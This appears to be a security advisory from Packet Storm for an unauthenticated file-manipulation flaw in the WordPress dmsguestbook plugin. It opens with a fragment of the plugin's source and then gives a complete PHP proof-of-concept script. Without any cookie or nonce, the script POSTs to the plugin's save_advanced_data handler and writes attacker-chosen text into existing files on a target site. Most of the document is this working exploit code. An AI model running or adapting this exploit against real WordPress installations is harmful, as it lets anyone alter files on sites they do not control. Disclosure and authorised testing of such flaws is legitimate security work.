http://packetstormsecurity.com/user/evex/
Author:Evex
Title:
WordPress dmsguestbook Plugin File Manipulation
Description:
The WordPress dmsguestbook plugin is vulnerable to a file manipulation
issue: its save_advanced_data handler lets an unauthenticated attacker
write attacker-supplied text into existing text files. The handler answers
"File not found!" for a path that does not exist, so only files that already
exist are affected; the PoC below sends the request without any session
cookie or nonce.
" . __("saved", "dmsguestbook") . "...",300,800);
} else {message("
" . __("File not found!", "dmsguestbook")
. "",300,800);}
}
*/
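// ---------------------------------------------------------------------------
// PoC driver.  Usage:  php poc.php [base_url] [file] [text]
//
// Each argument falls back to the original hard-coded value, so running the
// script with no arguments behaves as before.  The request is sent
// unconditionally when the file is loaded: only point it at an installation
// you are authorised to test, since it writes attacker-chosen text into a
// file on the target.
// ---------------------------------------------------------------------------

// Text that will be written into the target file.
$TEXTTOINJECT = isset($argv[3]) ? $argv[3] : 'INPUT TEXT HERE';

// File path as the plugin interprets it.  The default maps to
// <base_url>/wp-content/plugins/dmsguestbook/readme.txt.  Whether the handler
// accepts paths outside the plugin directory is not established here.
$TXTFILE = isset($argv[2]) ? $argv[2] : 'readme.txt';

// WordPress base URL (trailing slash stripped so the path join below is clean).
$url = rtrim(isset($argv[1]) ? $argv[1] : 'http://localhost/x/wordpress', '/');

// Build the form body with http_build_query() so that '&', '=', '%' or '+'
// in the injected text (or the file name) cannot break the parameter split;
// plain string concatenation sent those characters raw.
$postBody = http_build_query(array(
    'action'        => 'save_advanced_data',
    'file'          => $TXTFILE,
    'advanced_data' => $TEXTTOINJECT,
));

// No cookie and no nonce are attached on purpose: the advisory's claim is
// that save_advanced_data is reachable without a WordPress session.
$ch = curl_init($url . '/wp-admin/admin.php?page=dmsguestbook');
curl_setopt_array($ch, array(
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => $postBody,
    CURLOPT_RETURNTRANSFER => true,
    // Do not follow redirects: a 302 to wp-login.php is a signal worth seeing,
    // because it means the request never reached the plugin handler.
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT        => 30,
));

$response = curl_exec($ch);
$httpCode = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
$location = (string) curl_getinfo($ch, CURLINFO_REDIRECT_URL);
$curlErr  = curl_error($ch);
curl_close($ch);

// Previously "Payload Sent" was printed even when the connection failed;
// report transport errors and a login redirect instead of claiming success.
if ($response === false) {
    echo "Request failed: {$curlErr}\n";
    exit(1);
}
if ($httpCode >= 300 && $httpCode < 400 && strpos($location, 'wp-login.php') !== false) {
    echo "Got HTTP {$httpCode} redirect to {$location}: the handler was not reached, "
        . "so this target probably requires authentication.\n";
    exit(1);
}

// Report the file actually targeted (the old message always said readme.txt).
echo "Payload Sent\nUrl: {$url}/wp-content/plugins/dmsguestbook/{$TXTFILE}";
echo "\nHTTP status: {$httpCode}\n";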